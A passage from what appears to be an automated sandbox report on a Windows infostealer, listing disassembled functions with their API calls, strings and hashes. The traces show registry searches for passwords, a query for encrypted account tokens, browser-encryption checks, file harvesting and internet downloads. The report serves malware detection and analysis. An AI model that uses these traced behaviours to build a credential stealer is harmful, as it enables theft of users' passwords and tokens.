                                                    • Part of subcall function 02F194C7: wsprintfA.USER32 ref: 02F1952E
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 02F116C6
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 02F1170E
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 02F11755
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 02F1179D
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 02F117E5
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 02F1182C
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 02F11874
                                                    • Part of subcall function 02F1AA87: lstrlen.KERNEL32(02F0516C,?,?,02F0516C,00420DDE), ref: 02F1AA92
                                                    • Part of subcall function 02F1AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02F1AAEC
                                                  • strtok_s.MSVCRT ref: 02F119B7
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                                  • String ID:
                                                  • API String ID: 4276352425-0
                                                  • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                  • Instruction ID: b1beb072e2fb7bd847f8cf5a3f9b3b33c267100fa68c7363943671b28fe71a3a
                                                  • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                  • Instruction Fuzzy Hash: F971A7B6941118ABCB14EBB0DD98EEE737AAF64340F4045D9E20EA3140EE759B84CF51
                                                  Function 004072D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 00407314
                                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                  • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                    • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                                  • task.LIBCPMTD ref: 00407555
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                  • String ID: Password
                                                  • API String ID: 2698061284-3434357891
                                                  • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                  • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                                  • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                  • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                                  Function 00414780 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrcatA.KERNEL32(?,02D495F0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                                  • lstrcatA.KERNEL32(?,?), ref: 00414820
                                                  • lstrcatA.KERNEL32(?,?), ref: 00414834
                                                  • lstrcatA.KERNEL32(?,02D15A20), ref: 00414847
                                                  • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                                  • lstrcatA.KERNEL32(?,02D49C70), ref: 0041486F
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                    • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                    • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                    • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                                    • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                  • String ID: 0aA
                                                  • API String ID: 167551676-2786531170
                                                  • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                  • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                                  • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                  • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                                  Function 00418100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,02D49218,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,02D49218,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                                  • __aulldiv.LIBCMT ref: 00418172
                                                  • __aulldiv.LIBCMT ref: 00418180
                                                  • wsprintfA.USER32 ref: 004181AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                  • String ID: %d MB$@
                                                  • API String ID: 2886426298-3474575989
                                                  • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                  • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                                  • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                  • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                                  Function 02F06307 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A51
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A68
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A7F
                                                    • Part of subcall function 02F04A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02F04AA0
                                                    • Part of subcall function 02F04A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02F04AB0
                                                  • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 02F06376
                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 02F063AE
                                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 02F063F6
                                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02F0641A
                                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 02F06443
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 02F06471
                                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 02F064B0
                                                  • InternetCloseHandle.WININET(?), ref: 02F064BA
                                                  • InternetCloseHandle.WININET(00000000), ref: 02F064C7
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 4287319946-0
                                                  • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                  • Instruction ID: 2fd85c3d063ace671bfa8782885bc49d445a9729071a5c52b3ba632cf2a5501a
                                                  • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                  • Instruction Fuzzy Hash: 28517FB5A40218AFDB20DFA0DD84BEE7779EB44745F408098F705A71C0DBB46A85CFA5
                                                  Function 02F14FD7 Relevance: 12.6, APIs: 10, Instructions: 119stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 02F14FEE
                                                    • Part of subcall function 02F19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02F19072
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F15017
                                                  • lstrcat.KERNEL32(?,00421000), ref: 02F15034
                                                    • Part of subcall function 02F14B77: wsprintfA.USER32 ref: 02F14B93
                                                    • Part of subcall function 02F14B77: FindFirstFileA.KERNEL32(?,?), ref: 02F14BAA
                                                  • memset.MSVCRT ref: 02F1507A
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F150A3
                                                  • lstrcat.KERNEL32(?,00421020), ref: 02F150C0
                                                    • Part of subcall function 02F14B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 02F14BD8
                                                    • Part of subcall function 02F14B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 02F14BEE
                                                    • Part of subcall function 02F14B77: FindNextFileA.KERNEL32(000000FF,?), ref: 02F14DE4
                                                    • Part of subcall function 02F14B77: FindClose.KERNEL32(000000FF), ref: 02F14DF9
                                                  • memset.MSVCRT ref: 02F15106
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F1512F
                                                  • lstrcat.KERNEL32(?,00421038), ref: 02F1514C
                                                    • Part of subcall function 02F14B77: wsprintfA.USER32 ref: 02F14C17
                                                    • Part of subcall function 02F14B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 02F14C2C
                                                    • Part of subcall function 02F14B77: wsprintfA.USER32 ref: 02F14C49
                                                    • Part of subcall function 02F14B77: PathMatchSpecA.SHLWAPI(?,?), ref: 02F14C85
                                                    • Part of subcall function 02F14B77: lstrcat.KERNEL32(?,0064A524), ref: 02F14CB1
                                                    • Part of subcall function 02F14B77: lstrcat.KERNEL32(?,00420FF8), ref: 02F14CC3
                                                    • Part of subcall function 02F14B77: lstrcat.KERNEL32(?,?), ref: 02F14CD7
                                                    • Part of subcall function 02F14B77: lstrcat.KERNEL32(?,00420FFC), ref: 02F14CE9
                                                    • Part of subcall function 02F14B77: lstrcat.KERNEL32(?,?), ref: 02F14CFD
                                                    • Part of subcall function 02F14B77: CopyFileA.KERNEL32(?,?,00000001), ref: 02F14D13
                                                    • Part of subcall function 02F14B77: DeleteFileA.KERNEL32(?), ref: 02F14D98
                                                  • memset.MSVCRT ref: 02F15192
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                  • String ID:
                                                  • API String ID: 4017274736-0
                                                  • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                  • Instruction ID: c3aa39550383a1f48dbff5efe3d0bd122a2212b73e108fbcdc1765d49e8bd5d9
                                                  • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                  • Instruction Fuzzy Hash: 0641B579A4021867D714F7B0EC46FD97739AF24741F804494A689660C0EEB857C8CF92
                                                  Function 02F18367 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 02F18397
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F1839E
                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 02F183BF
                                                  • __aulldiv.LIBCMT ref: 02F183D9
                                                  • __aulldiv.LIBCMT ref: 02F183E7
                                                  • wsprintfA.USER32 ref: 02F18413
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                                  • String ID: @
                                                  • API String ID: 2774356765-2766056989
                                                  • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                  • Instruction ID: f5b0de0ed2fa3a5ada9f05db07dbe95c9d80e4b03219ea81d527e5a1e51a1e26
                                                  • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                  • Instruction Fuzzy Hash: 4F2147B1E44218ABEB00DFD4CD49FAEBBB9FB44B44F504609F705BB280D77869008BA5
                                                  Function 0040BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                  • API String ID: 1440504306-1079375795
                                                  • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                  • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                                  • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                  • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                                  Function 00416770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess$DefaultLangUser
                                                  • String ID: B
                                                  • API String ID: 1494266314-2248957098
                                                  • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                  • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                                  • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                  • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                                  Function 00409E10 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 167memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                                  • memset.MSVCRT ref: 00409EE8
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                                  • API String ID: 1977917189-1096346117
                                                  • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                  • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                                  • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                  • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                                  Function 02F07837 Relevance: 12.1, APIs: 8, Instructions: 91stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F07537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 02F075A1
                                                    • Part of subcall function 02F07537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 02F07618
                                                    • Part of subcall function 02F07537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 02F07674
                                                    • Part of subcall function 02F07537: GetProcessHeap.KERNEL32(00000000,?), ref: 02F076B9
                                                    • Part of subcall function 02F07537: HeapFree.KERNEL32(00000000), ref: 02F076C0
                                                  • lstrcat.KERNEL32(0064A668,004217FC), ref: 02F0786D
                                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 02F078AF
                                                  • lstrcat.KERNEL32(0064A668,00421800), ref: 02F078C1
                                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 02F078F6
                                                  • lstrcat.KERNEL32(0064A668,00421804), ref: 02F07907
                                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 02F0793A
                                                  • lstrcat.KERNEL32(0064A668,00421808), ref: 02F07954
                                                  • task.LIBCPMTD ref: 02F07962
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                                  • String ID:
                                                  • API String ID: 2677904052-0
                                                  • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                  • Instruction ID: 7a7275b3faa72a80663e553d2bfb2121f7a666b8b9869214e16651e75534c2e5
                                                  • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                  • Instruction Fuzzy Hash: 4B312B7AE40109EFDB04FBE0DCD4DFEB77AEB49341B145118E206A72A0DA34A942DF61
                                                  Function 02F05217 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02F05231
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F05238
                                                  • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 02F05251
                                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 02F05278
                                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 02F052A8
                                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 02F052F1
                                                  • InternetCloseHandle.WININET(?), ref: 02F05320
                                                  • InternetCloseHandle.WININET(?), ref: 02F0532D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                                  • String ID:
                                                  • API String ID: 1008454911-0
                                                  • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                  • Instruction ID: 466f1aa4723cdc2cf97b3fff85cdecc4069b5dbf4ec64f336c576525b28d45b9
                                                  • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                  • Instruction Fuzzy Hash: EA31E6B9A40218ABDB20CF94DC85BDCB7B5FB48704F5081D9E709A7280D7B46AC5CF99
                                                  Function 00404FB0 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                                  • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                                  • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                                  • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                                  • InternetCloseHandle.WININET(?), ref: 004050C6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                                  • String ID:
                                                  • API String ID: 3894370878-0
                                                  • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
